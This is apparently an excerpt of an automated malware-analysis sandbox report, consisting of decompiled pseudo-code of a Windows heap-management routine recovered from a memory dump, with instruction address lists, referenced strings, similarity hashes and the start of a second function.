				signed int _t265;
				signed int _t266;
				signed int _t267;
				intOrPtr _t270;
				signed int _t280;
				signed int _t286;
				signed int _t289;
				intOrPtr _t290;
				signed int _t291;
				signed int _t317;
				signed short _t320;
				intOrPtr _t327;
				signed int _t339;
				signed int _t344;
				signed int _t347;
				intOrPtr _t348;
				signed int _t350;
				signed int _t352;
				signed int _t353;
				signed int _t356;
				intOrPtr _t357;
				intOrPtr _t366;
				signed int _t367;
				signed int _t370;
				intOrPtr _t371;
				signed int _t372;
				signed int _t394;
				signed short _t402;
				intOrPtr _t404;
				intOrPtr _t415;
				signed int _t430;
				signed int _t433;
				signed int _t437;
				signed int _t445;
				signed short _t446;
				signed short _t449;
				signed short _t452;
				signed int _t455;
				signed int _t460;
				signed short* _t468;
				signed int _t480;
				signed int _t481;
				signed int _t483;
				intOrPtr _t484;
				signed int _t491;
				unsigned int _t506;
				unsigned int _t508;
				signed int _t513;
				signed int _t514;
				signed int _t521;
				signed short* _t533;
				signed int _t541;
				signed int _t543;
				signed int _t546;
				unsigned int _t551;
				signed int _t553;

				_t450 = __ecx;
				_t553 = __ecx;
				_t539 = __edx;
				_v28 = 0;
				_v40 = 0;
				if(( *(__ecx + 0xcc) ^  *0xfe8a68) != 0) {
					_push(_a4);
					_t513 = __edx;
					L11:
					_t246 = E00F1A830(_t450, _t513);
					L7:
					return _t246;
				}
				if(_a8 != 0) {
					__eflags =  *(__edx + 2) & 0x00000008;
					if(( *(__edx + 2) & 0x00000008) != 0) {
						 *((intOrPtr*)(__ecx + 0x230)) =  *((intOrPtr*)(__ecx + 0x230)) - 1;
						_t430 = E00F1DF24(__edx,  &_v12,  &_v16);
						__eflags = _t430;
						if(_t430 != 0) {
							_t157 = _t553 + 0x234;
							 *_t157 =  *(_t553 + 0x234) - _v16;
							__eflags =  *_t157;
						}
					}
					_t445 = _a4;
					_t514 = _t539;
					_v48 = _t539;
					L14:
					_t247 =  *((intOrPtr*)(_t539 + 6));
					__eflags = _t247;
					if(_t247 == 0) {
						_t541 = _t553;
					} else {
						_t541 = (_t539 & 0xffff0000) - ((_t247 & 0x000000ff) << 0x10) + 0x10000;
						__eflags = _t541;
					}
					_t249 = 7 + _t445 * 8 + _t514;
					_v12 = _t249;
					__eflags =  *_t249 - 3;
					if( *_t249 == 3) {
						_v16 = _t514 + _t445 * 8 + 8;
						E00EF9373(_t553, _t514 + _t445 * 8 + 8);
						_t452 = _v16;
						_v28 =  *(_t452 + 0x10);
						 *((intOrPtr*)(_t541 + 0x30)) =  *((intOrPtr*)(_t541 + 0x30)) - 1;
						_v36 =  *(_t452 + 0x14);
						 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) - ( *(_t452 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) +  *(_t452 + 0x14);
						 *((intOrPtr*)(_t553 + 0x1f8)) =  *((intOrPtr*)(_t553 + 0x1f8)) - 1;
						_t256 =  *(_t452 + 0x14);
						__eflags = _t256 - 0x7f000;
						if(_t256 >= 0x7f000) {
							_t142 = _t553 + 0x1ec;
							 *_t142 =  *(_t553 + 0x1ec) - _t256;
							__eflags =  *_t142;
							_t256 =  *(_t452 + 0x14);
						}
						_t513 = _v48;
						_t445 = _t445 + (_t256 >> 3) + 0x20;
						_a4 = _t445;
						_v40 = 1;
					} else {
						_t27 =  &_v36;
						 *_t27 = _v36 & 0x00000000;
						__eflags =  *_t27;
					}
					__eflags =  *((intOrPtr*)(_t553 + 0x54)) -  *((intOrPtr*)(_t513 + 4));
					if( *((intOrPtr*)(_t553 + 0x54)) ==  *((intOrPtr*)(_t513 + 4))) {
						_v44 = _t513;
						_t262 = E00EFA9EF(_t541, _t513);
						__eflags = _a8;
						_v32 = _t262;
						if(_a8 != 0) {
							__eflags = _t262;
							if(_t262 == 0) {
								goto L19;
							}
						}
						__eflags =  *0xfe8748 - 1;
						if( *0xfe8748 >= 1) {
							__eflags = _t262;
							if(_t262 == 0) {
								_t415 =  *[fs:0x30];
								__eflags =  *(_t415 + 0xc);
								if( *(_t415 + 0xc) == 0) {
									_push("HEAP: ");
									E00EFB150();
								} else {
									E00EFB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push("(UCRBlock != NULL)");
								E00EFB150();
								__eflags =  *0xfe7bc8;
								if( *0xfe7bc8 == 0) {
									__eflags = 1;
									E00FB2073(_t445, 1, _t541, 1);
								}
								_t513 = _v48;
								_t445 = _a4;
							}
						}
						_t350 = _v40;
						_t480 = _t445 << 3;
						_v20 = _t480;
						_t481 = _t480 + _t513;
						_v24 = _t481;
						__eflags = _t350;
						if(_t350 == 0) {
							_t481 = _t481 + 0xfffffff0;
							__eflags = _t481;
						}
						_t483 = (_t481 & 0xfffff000) - _v44;
						__eflags = _t483;
						_v52 = _t483;
						if(_t483 == 0) {
							__eflags =  *0xfe8748 - 1;
							if( *0xfe8748 < 1) {
								goto L9;
							}
							__eflags = _t350;
							goto L146;
						} else {
							_t352 = E00F2174B( &_v44,  &_v52, 0x4000);
							__eflags = _t352;
							if(_t352 < 0) {
								goto L94;
							}
							_t353 = E00F17D50();
							_t447 = 0x7ffe0380;
							__eflags = _t353;
							if(_t353 != 0) {
								_t356 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t356 = 0x7ffe0380;
							}
							__eflags =  *_t356;
							if( *_t356 != 0) {
								_t357 =  *[fs:0x30];
								__eflags =  *(_t357 + 0x240) & 0x00000001;
								if(( *(_t357 + 0x240) & 0x00000001) != 0) {
									E00FB14FB(_t447, _t553, _v44, _v52, 5);
								}
							}
							_t358 = _v32;
							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
							_t484 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t484 - 0x7f000;
							if(_t484 >= 0x7f000) {
								_t90 = _t553 + 0x1ec;
								 *_t90 =  *(_t553 + 0x1ec) - _t484;
								__eflags =  *_t90;
							}
							E00EF9373(_t553, _t358);
							_t486 = _v32;
							 *((intOrPtr*)(_v32 + 0x14)) =  *((intOrPtr*)(_v32 + 0x14)) + _v52;
							E00EF9819(_t486);
							 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) + (_v52 >> 0xc);
							 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) - _v52;
							_t366 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t366 - 0x7f000;
							if(_t366 >= 0x7f000) {
								_t104 = _t553 + 0x1ec;
								 *_t104 =  *(_t553 + 0x1ec) + _t366;
								__eflags =  *_t104;
							}
							__eflags = _v40;
							if(_v40 == 0) {
								_t533 = _v52 + _v44;
								_v32 = _t533;
								_t533[2] =  *((intOrPtr*)(_t553 + 0x54));
								__eflags = _v24 - _v52 + _v44;
								if(_v24 == _v52 + _v44) {
									__eflags =  *(_t553 + 0x4c);
									if( *(_t553 + 0x4c) != 0) {
										_t533[1] = _t533[1] ^ _t533[0] ^  *_t533;
										 *_t533 =  *_t533 ^  *(_t553 + 0x50);
									}
								} else {
									_t449 = 0;
									_t533[3] = 0;
									_t533[1] = 0;
									_t394 = _v20 - _v52 >> 0x00000003 & 0x0000ffff;
									_t491 = _t394;
									 *_t533 = _t394;
									__eflags =  *0xfe8748 - 1; // 0x0
									if(__eflags >= 0) {
										__eflags = _t491 - 1;
										if(_t491 <= 1) {
											_t404 =  *[fs:0x30];
											__eflags =  *(_t404 + 0xc);
											if( *(_t404 + 0xc) == 0) {
												_push("HEAP: ");
												E00EFB150();
											} else {
												E00EFB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
											}
											_push("((LONG)FreeEntry->Size > 1)");
											E00EFB150();
											_pop(_t491);
											__eflags =  *0xfe7bc8 - _t449; // 0x0
											if(__eflags == 0) {
												__eflags = 0;
												_t491 = 1;
												E00FB2073(_t449, 1, _t541, 0);
											}
											_t533 = _v32;
										}
									}
									_t533[1] = _t449;
									__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
									if( *((intOrPtr*)(_t541 + 0x18)) != _t541) {
										_t402 = (_t533 - _t541 >> 0x10) + 1;
										_v16 = _t402;
										__eflags = _t402 - 0xfe;
										if(_t402 >= 0xfe) {
											_push(_t491);
											_push(_t449);
											E00FBA80D( *((intOrPtr*)(_t541 + 0x18)), 3, _t533, _t541);
											_t533 = _v48;
											_t402 = _v32;
										}
										_t449 = _t402;
									}
									_t533[3] = _t449;
									E00F1A830(_t553, _t533,  *_t533 & 0x0000ffff);
									_t447 = 0x7ffe0380;
								}
							}
							_t367 = E00F17D50();
							__eflags = _t367;
							if(_t367 != 0) {
								_t370 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t370 = _t447;
							}
							__eflags =  *_t370;
							if( *_t370 != 0) {
								_t371 =  *[fs:0x30];
								__eflags =  *(_t371 + 0x240) & 1;
								if(( *(_t371 + 0x240) & 1) != 0) {
									__eflags = E00F17D50();
									if(__eflags != 0) {
										_t447 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
									}
									E00FB1411(_t447, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _v40, _v36,  *_t447 & 0x000000ff);
								}
							}
							_t372 = E00F17D50();
							_t546 = 0x7ffe038a;
							_t446 = 0x230;
							__eflags = _t372;
							if(_t372 != 0) {
								_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							} else {
								_t246 = 0x7ffe038a;
							}
							__eflags =  *_t246;
							if( *_t246 == 0) {
								goto L7;
							} else {
								__eflags = E00F17D50();
								if(__eflags != 0) {
									_t546 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + _t446;
									__eflags = _t546;
								}
								_push( *_t546 & 0x000000ff);
								_push(_v36);
								_push(_v40);
								goto L120;
							}
						}
					} else {
						L19:
						_t31 = _t513 + 0x101f; // 0x101f
						_t455 = _t31 & 0xfffff000;
						_t32 = _t513 + 0x28; // 0x28
						_v44 = _t455;
						__eflags = _t455 - _t32;
						if(_t455 == _t32) {
							_t455 = _t455 + 0x1000;
							_v44 = _t455;
						}
						_t265 = _t445 << 3;
						_v24 = _t265;
						_t266 = _t265 + _t513;
						__eflags = _v40;
						_v20 = _t266;
						if(_v40 == 0) {
							_t266 = _t266 + 0xfffffff0;
							__eflags = _t266;
						}
						_t267 = _t266 & 0xfffff000;
						_v52 = _t267;
						__eflags = _t267 - _t455;
						if(_t267 < _t455) {
							__eflags =  *0xfe8748 - 1; // 0x0
							if(__eflags < 0) {
								L9:
								_t450 = _t553;
								L10:
								_push(_t445);
								goto L11;
							}
							__eflags = _v40;
							L146:
							if(__eflags == 0) {
								goto L9;
							}
							_t270 =  *[fs:0x30];
							__eflags =  *(_t270 + 0xc);
							if( *(_t270 + 0xc) == 0) {
								_push("HEAP: ");
								E00EFB150();
							} else {
								E00EFB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("(!TrailingUCR)");
							E00EFB150();
							__eflags =  *0xfe7bc8;
							if( *0xfe7bc8 == 0) {
								__eflags = 0;
								E00FB2073(_t445, 1, _t541, 0);
							}
							L152:
							_t445 = _a4;
							L153:
							_t513 = _v48;
							goto L9;
						}
						_v32 = _t267;
						_t280 = _t267 - _t455;
						_v32 = _v32 - _t455;
						__eflags = _a8;
						_t460 = _v32;
						_v52 = _t460;
						if(_a8 != 0) {
							L27:
							__eflags = _t280;
							if(_t280 == 0) {
								L33:
								_t446 = 0;
								__eflags = _v40;
								if(_v40 == 0) {
									_t468 = _v44 + _v52;
									_v36 = _t468;
									_t468[2] =  *((intOrPtr*)(_t553 + 0x54));
									__eflags = _v20 - _v52 + _v44;
									if(_v20 == _v52 + _v44) {
										__eflags =  *(_t553 + 0x4c);
										if( *(_t553 + 0x4c) != 0) {
											_t468[1] = _t468[1] ^ _t468[0] ^  *_t468;
											 *_t468 =  *_t468 ^  *(_t553 + 0x50);
										}
									} else {
										_t468[3] = 0;
										_t468[1] = 0;
										_t317 = _v24 - _v52 - _v44 + _t513 >> 0x00000003 & 0x0000ffff;
										_t521 = _t317;
										 *_t468 = _t317;
										__eflags =  *0xfe8748 - 1; // 0x0
										if(__eflags >= 0) {
											__eflags = _t521 - 1;
											if(_t521 <= 1) {
												_t327 =  *[fs:0x30];
												__eflags =  *(_t327 + 0xc);
												if( *(_t327 + 0xc) == 0) {
													_push("HEAP: ");
													E00EFB150();
												} else {
													E00EFB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
												}
												_push("(LONG)FreeEntry->Size > 1");
												E00EFB150();
												__eflags =  *0xfe7bc8 - _t446; // 0x0
												if(__eflags == 0) {
													__eflags = 1;
													E00FB2073(_t446, 1, _t541, 1);
												}
												_t468 = _v36;
											}
										}
										_t468[1] = _t446;
										_t522 =  *((intOrPtr*)(_t541 + 0x18));
										__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
										if( *((intOrPtr*)(_t541 + 0x18)) == _t541) {
											_t320 = _t446;
										} else {
											_t320 = (_t468 - _t541 >> 0x10) + 1;
											_v12 = _t320;
											__eflags = _t320 - 0xfe;
											if(_t320 >= 0xfe) {
												_push(_t468);
												_push(_t446);
												E00FBA80D(_t522, 3, _t468, _t541);
												_t468 = _v52;
												_t320 = _v28;
											}
										}
										_t468[3] = _t320;
										E00F1A830(_t553, _t468,  *_t468 & 0x0000ffff);
									}
								}
								E00F1B73D(_t553, _t541, _v44 + 0xffffffe8, _v52, _v48,  &_v8);
								E00F1A830(_t553, _v64, _v24);
								_t286 = E00F17D50();
								_t542 = 0x7ffe0380;
								__eflags = _t286;
								if(_t286 != 0) {
									_t289 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								} else {
									_t289 = 0x7ffe0380;
								}
								__eflags =  *_t289;
								if( *_t289 != 0) {
									_t290 =  *[fs:0x30];
									__eflags =  *(_t290 + 0x240) & 1;
									if(( *(_t290 + 0x240) & 1) != 0) {
										__eflags = E00F17D50();
										if(__eflags != 0) {
											_t542 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
											__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										}
										E00FB1411(_t446, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _t446, _t446,  *_t542 & 0x000000ff);
									}
								}
								_t291 = E00F17D50();
								_t543 = 0x7ffe038a;
								__eflags = _t291;
								if(_t291 != 0) {
									_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
								} else {
									_t246 = 0x7ffe038a;
								}
								__eflags =  *_t246;
								if( *_t246 != 0) {
									__eflags = E00F17D50();
									if(__eflags != 0) {
										_t543 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
										__eflags = _t543;
									}
									_push( *_t543 & 0x000000ff);
									_push(_t446);
									_push(_t446);
									L120:
									_push( *(_t553 + 0x74) << 3);
									_push(_v52);
									_t246 = E00FB1411(_t446, _t553, _v44, __eflags);
								}
								goto L7;
							}
							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
							_t339 = E00F2174B( &_v44,  &_v52, 0x4000);
							__eflags = _t339;
							if(_t339 < 0) {
								L94:
								 *((intOrPtr*)(_t553 + 0x210)) =  *((intOrPtr*)(_t553 + 0x210)) + 1;
								__eflags = _v40;
								if(_v40 == 0) {
									goto L153;
								}
								E00F1B73D(_t553, _t541, _v28 + 0xffffffe8, _v36, _v48,  &_a4);
								goto L152;
							}
							_t344 = E00F17D50();
							__eflags = _t344;
							if(_t344 != 0) {
								_t347 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t347 = 0x7ffe0380;
							}
							__eflags =  *_t347;
							if( *_t347 != 0) {
								_t348 =  *[fs:0x30];
								__eflags =  *(_t348 + 0x240) & 1;
								if(( *(_t348 + 0x240) & 1) != 0) {
									E00FB14FB(_t445, _t553, _v44, _v52, 6);
								}
							}
							_t513 = _v48;
							goto L33;
						}
						__eflags =  *_v12 - 3;
						_t513 = _v48;
						if( *_v12 == 3) {
							goto L27;
						}
						__eflags = _t460;
						if(_t460 == 0) {
							goto L9;
						}
						__eflags = _t460 -  *((intOrPtr*)(_t553 + 0x6c));
						if(_t460 <  *((intOrPtr*)(_t553 + 0x6c))) {
							goto L9;
						}
						goto L27;
					}
				}
				_t445 = _a4;
				if(_t445 <  *((intOrPtr*)(__ecx + 0x6c))) {
					_t513 = __edx;
					goto L10;
				}
				_t433 =  *((intOrPtr*)(__ecx + 0x74)) + _t445;
				_v20 = _t433;
				if(_t433 <  *((intOrPtr*)(__ecx + 0x70)) || _v20 <  *(__ecx + 0x1e8) >>  *((intOrPtr*)(__ecx + 0x240)) + 3) {
					_t513 = _t539;
					goto L9;
				} else {
					_t437 = E00F199BF(__ecx, __edx,  &_a4, 0);
					_t445 = _a4;
					_t514 = _t437;
					_v56 = _t514;
					if(_t445 - 0x201 > 0xfbff) {
						goto L14;
					} else {
						E00F1A830(__ecx, _t514, _t445);
						_t506 =  *(_t553 + 0x238);
						_t551 =  *((intOrPtr*)(_t553 + 0x1e8)) - ( *(_t553 + 0x74) << 3);
						_t246 = _t506 >> 4;
						if(_t551 < _t506 - _t246) {
							_t508 =  *(_t553 + 0x23c);
							_t246 = _t508 >> 2;
							__eflags = _t551 - _t508 - _t246;
							if(_t551 > _t508 - _t246) {
								_t246 = E00F2ABD8(_t553);
								 *(_t553 + 0x23c) = _t551;
								 *(_t553 + 0x238) = _t551;
							}
						}
						goto L7;
					}
				}
			}

0x00f1a309
0x00f1a316
0x00f1a319
0x00f1a31d
0x00f1a32d
0x00f1a331
0x00f61e0d
0x00f61e10
0x00f1a3cb
0x00f1a3cb
0x00f1a3bd
0x00f1a3c3
0x00f1a3c3
0x00f1a33a
0x00f61e17
0x00f61e1b
0x00f61e1d
0x00f61e2f
0x00f61e34
0x00f61e36
0x00f61e3c
0x00f61e3c
0x00f61e3c
0x00f61e3c
0x00f61e36
0x00f61e42
0x00f61e45
0x00f61e47
0x00f1a3f8
0x00f1a3f8
0x00f1a3fb
0x00f1a3fd
0x00f61e50
0x00f1a403
0x00f1a411
0x00f1a411
0x00f1a411
0x00f1a41e
0x00f1a420
0x00f1a424
0x00f1a427
0x00f1a7c9
0x00f1a7cd
0x00f1a7d2
0x00f1a7d9
0x00f1a7e0
0x00f1a7e3
0x00f1a7ed
0x00f1a7f3
0x00f1a7f9
0x00f1a7ff
0x00f1a802
0x00f1a807
0x00f1a809
0x00f1a809
0x00f1a809
0x00f1a80f
0x00f1a80f
0x00f1a812
0x00f1a81c
0x00f1a821
0x00f1a824
0x00f1a42d
0x00f1a42d
0x00f1a42d
0x00f1a42d
0x00f1a42d
0x00f1a436
0x00f1a43a
0x00f1a609
0x00f1a60d
0x00f1a612
0x00f1a616
0x00f1a61a
0x00f61e57
0x00f61e59
0x00000000
0x00000000
0x00f61e5f
0x00f1a620
0x00f1a627
0x00f61e64
0x00f61e66
0x00f61e6c
0x00f61e72
0x00f61e76
0x00f61e95
0x00f61e9a
0x00f61e78
0x00f61e8d
0x00f61e92
0x00f61ea0
0x00f61ea5
0x00f61eaa
0x00f61eb2
0x00f61eb6
0x00f61eb9
0x00f61eb9
0x00f61ebe
0x00f61ec2
0x00f61ec2
0x00f61e66
0x00f1a62d
0x00f1a633
0x00f1a636
0x00f1a63a
0x00f1a63c
0x00f1a640
0x00f1a642
0x00f1a644
0x00f1a644
0x00f1a644
0x00f1a64d
0x00f1a64d
0x00f1a651
0x00f1a655
0x00f61eca
0x00f61ed1
0x00000000
0x00000000
0x00f61ed7
0x00000000
0x00f1a65b
0x00f1a669
0x00f1a66e
0x00f1a670
0x00000000
0x00000000
0x00f1a676
0x00f1a67b
0x00f1a680
0x00f1a682
0x00f61f1a
0x00f1a688
0x00f1a688
0x00f1a688
0x00f1a68a
0x00f1a68d
0x00f61f24
0x00f61f2a
0x00f61f31
0x00f61f43
0x00f61f43
0x00f61f31
0x00f1a693
0x00f1a697
0x00f1a69d
0x00f1a6a0
0x00f1a6a6
0x00f1a6a8
0x00f1a6a8
0x00f1a6a8
0x00f1a6a8
0x00f1a6b2
0x00f1a6b7
0x00f1a6c1
0x00f1a6c6
0x00f1a6d2
0x00f1a6d9
0x00f1a6e3
0x00f1a6e6
0x00f1a6eb
0x00f1a6ed
0x00f1a6ed
0x00f1a6ed
0x00f1a6ed
0x00f1a6f3
0x00f1a6f8
0x00f1a702
0x00f1a70a
0x00f1a70e
0x00f1a71a
0x00f1a71e
0x00f61fcb
0x00f61fcf
0x00f61fdd
0x00f61fe3
0x00f61fe3
0x00f1a724
0x00f1a728
0x00f1a72a
0x00f1a72d
0x00f1a737
0x00f1a73a
0x00f1a73c
0x00f1a742
0x00f1a748
0x00f61f4d
0x00f61f50
0x00f61f56
0x00f61f5c
0x00f61f5f
0x00f61f7e
0x00f61f83
0x00f61f61
0x00f61f76
0x00f61f7b
0x00f61f89
0x00f61f8e
0x00f61f93
0x00f61f94
0x00f61f9a
0x00f61f9c
0x00f61f9e
0x00f61fa1
0x00f61fa1
0x00f61fa6
0x00f61fa6
0x00f61f50
0x00f1a74e
0x00f1a751
0x00f1a754
0x00f1a75d
0x00f1a75e
0x00f1a762
0x00f1a767
0x00f61faf
0x00f61fb0
0x00f61fb9
0x00f61fbe
0x00f61fc2
0x00f61fc2
0x00f1a76d
0x00f1a76d
0x00f1a775
0x00f1a778
0x00f1a77d
0x00f1a77d
0x00f1a71e
0x00f1a782
0x00f1a787
0x00f1a789
0x00f61ff3
0x00f1a78f
0x00f1a78f
0x00f1a78f
0x00f1a791
0x00f1a794
0x00f61ffd
0x00f62006
0x00f6200c
0x00f62017
0x00f62019
0x00f62024
0x00f62024
0x00f62024
0x00f62047
0x00f62047
0x00f6200c
0x00f1a79a
0x00f1a79f
0x00f1a7a4
0x00f1a7a9
0x00f1a7ab
0x00f6205a
0x00f1a7b1
0x00f1a7b1
0x00f1a7b1
0x00f1a7b3
0x00f1a7b6
0x00000000
0x00f1a7bc
0x00f62066
0x00f62068
0x00f62073
0x00f62073
0x00f62073
0x00f62078
0x00f62079
0x00f6207d
0x00000000
0x00f6207d
0x00f1a7b6
0x00f1a440
0x00f1a440
0x00f1a440
0x00f1a446
0x00f1a44c
0x00f1a44f
0x00f1a453
0x00f1a455
0x00f620b3
0x00f620b9
0x00f620b9
0x00f1a45d
0x00f1a460
0x00f1a464
0x00f1a466
0x00f1a46b
0x00f1a46f
0x00f1a471
0x00f1a471
0x00f1a471
0x00f1a474
0x00f1a479
0x00f1a47d
0x00f1a47f
0x00f62229
0x00f6222f
0x00f1a3c8
0x00f1a3c8
0x00f1a3ca
0x00f1a3ca
0x00000000
0x00f1a3ca
0x00f62235
0x00f6223a
0x00f6223a
0x00000000
0x00000000
0x00f62240
0x00f62246
0x00f6224a
0x00f62269
0x00f6226e
0x00f6224c
0x00f62261
0x00f62266
0x00f62274
0x00f62279
0x00f6227e
0x00f62286
0x00f62288
0x00f6228d
0x00f6228d
0x00f62292
0x00f62292
0x00f62295
0x00f62295
0x00000000
0x00f62295
0x00f1a485
0x00f1a489
0x00f1a48b
0x00f1a48f
0x00f1a493
0x00f1a497
0x00f1a49b
0x00f1a4bb
0x00f1a4bb
0x00f1a4bd
0x00f1a4ff
0x00f1a4ff
0x00f1a501
0x00f1a505
0x00f1a50f
0x00f1a517
0x00f1a51b
0x00f1a527
0x00f1a52b
0x00f62182
0x00f62185
0x00f62193
0x00f62199
0x00f62199
0x00f1a531
0x00f1a535
0x00f1a538
0x00f1a548
0x00f1a54b
0x00f1a54d
0x00f1a553
0x00f1a559
0x00f62100
0x00f62103
0x00f62109
0x00f6210f
0x00f62112
0x00f62131
0x00f62136
0x00f62114
0x00f62129
0x00f6212e
0x00f6213c
0x00f62141
0x00f62147
0x00f6214d
0x00f62151
0x00f62154
0x00f62154
0x00f62159
0x00f62159
0x00f62103
0x00f1a55f
0x00f1a562
0x00f1a565
0x00f1a567
0x00f62162
0x00f1a56d
0x00f1a574
0x00f1a575
0x00f1a579
0x00f1a57e
0x00f62169
0x00f6216a
0x00f62170
0x00f62175
0x00f62179
0x00f62179
0x00f1a57e
0x00f1a584
0x00f1a58f
0x00f1a58f
0x00f1a52b
0x00f1a5ad
0x00f1a5bc
0x00f1a5c1
0x00f1a5c6
0x00f1a5cb
0x00f1a5cd
0x00f621a9
0x00f1a5d3
0x00f1a5d3
0x00f1a5d3
0x00f1a5d5
0x00f1a5d8
0x00f621b3
0x00f621bc
0x00f621c2
0x00f621cd
0x00f621cf
0x00f621da
0x00f621da
0x00f621da
0x00f621f7
0x00f621f7
0x00f621c2
0x00f1a5de
0x00f1a5e3
0x00f1a5e8
0x00f1a5ea
0x00f6220a
0x00f1a5f0
0x00f1a5f0
0x00f1a5f0
0x00f1a5f2
0x00f1a5f5
0x00f62219
0x00f6221b
0x00f6208c
0x00f6208c
0x00f6208c
0x00f62095
0x00f62096
0x00f62097
0x00f62098
0x00f620a4
0x00f620a5
0x00f620a9
0x00f620a9
0x00000000
0x00f1a5f5
0x00f1a4bf
0x00f1a4d3
0x00f1a4d8
0x00f1a4da
0x00f61ede
0x00f61ede
0x00f61ee4
0x00f61ee9
0x00000000
0x00000000
0x00f61f07
0x00000000
0x00f61f07
0x00f1a4e0
0x00f1a4e5
0x00f1a4e7
0x00f620cb
0x00f1a4ed
0x00f1a4ed
0x00f1a4ed
0x00f1a4f2
0x00f1a4f5
0x00f620d5
0x00f620de
0x00f620e4
0x00f620f6
0x00f620f6
0x00f620e4
0x00f1a4fb
0x00000000
0x00f1a4fb
0x00f1a4a1
0x00f1a4a4
0x00f1a4a8
0x00000000
0x00000000
0x00f1a4aa
0x00f1a4ac
0x00000000
0x00000000
0x00f1a4b2
0x00f1a4b5
0x00000000
0x00000000
0x00000000
0x00f1a4b5
0x00f1a43a
0x00f1a340
0x00f1a346
0x00f1a600
0x00000000
0x00f1a600
0x00f1a34f
0x00f1a351
0x00f1a358
0x00f1a3c6
0x00000000
0x00f1a371
0x00f1a37a
0x00f1a37f
0x00f1a382
0x00f1a384
0x00f1a394
0x00000000
0x00f1a396
0x00f1a399
0x00f1a3a7
0x00f1a3b0
0x00f1a3b4
0x00f1a3bb
0x00f1a3d2
0x00f1a3da
0x00f1a3df
0x00f1a3e1
0x00f1a3e5
0x00f1a3ea
0x00f1a3f0
0x00f1a3f0
0x00f1a3e1
0x00000000
0x00f1a3bb
0x00f1a394

Strings

(!TrailingUCR), xrefs: 00F62274
HEAP[%wZ]: , xrefs: 00F61E88, 00F61F71, 00F62124, 00F6225C
(LONG)FreeEntry->Size > 1, xrefs: 00F6213C
((LONG)FreeEntry->Size > 1), xrefs: 00F61F89
(UCRBlock != NULL), xrefs: 00F61EA0
HEAP: , xrefs: 00F61E95, 00F61F7E, 00F62131, 00F62269

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
API String ID: 0-523794902
Opcode ID: 3da0bbb25418a50d60069407ebaf156d974c2cb4ca9ffb50fce6fc3af4e4e607
Instruction ID: c1d8f2589dbe5ab1ae6d87ffd8ef51f5a14b2ba63e472a6ec799f83e508d6b57
Opcode Fuzzy Hash: 3da0bbb25418a50d60069407ebaf156d974c2cb4ca9ffb50fce6fc3af4e4e607
Instruction Fuzzy Hash: B54211316097819FC715DF28C894BAABBE1FF88314F18496DF8868B352D734D981EB52

Uniqueness

Uniqueness Score: -1.00%

Function 00FB2D82, Relevance: 7.7, Strings: 6, Instructions: 228
COMMONCrypto

Download Yara Rule

C-Code - Quality: 64%

			E00FB2D82(void* __ebx, intOrPtr* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t83;
				signed char _t89;
				intOrPtr _t90;
				signed char _t101;
				signed int _t102;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				intOrPtr _t108;
				intOrPtr _t112;
				short* _t130;
				short _t131;
				signed int _t148;
				intOrPtr _t149;
				signed int* _t154;
				short* _t165;
				signed int _t171;
				void* _t182;

				_push(0x44);
				_push(0xfd0e80);
				E00F4D0E8(__ebx, __edi, __esi);
				_t177 = __edx;
				_t181 = __ecx;
				 *((intOrPtr*)(_t182 - 0x44)) = __ecx;
				 *((char*)(_t182 - 0x1d)) = 0;
				 *(_t182 - 0x24) = 0;
				if(( *(__ecx + 0x44) & L"id volume label has been specified.\r\n") == 0) {
					 *((intOrPtr*)(_t182 - 4)) = 0;
					 *((intOrPtr*)(_t182 - 4)) = 1;
					_t83 = E00EF40E1("RtlAllocateHeap");
					__eflags = _t83;
					if(_t83 == 0) {
						L48:
						 *(_t182 - 0x24) = 0;
						L49:
						 *((intOrPtr*)(_t182 - 4)) = 0;
						 *((intOrPtr*)(_t182 - 4)) = 0xfffffffe;
						E00FB30C4();
						goto L50;
					}
					_t89 =  *(__ecx + 0x44) | __edx | 0x10000100;
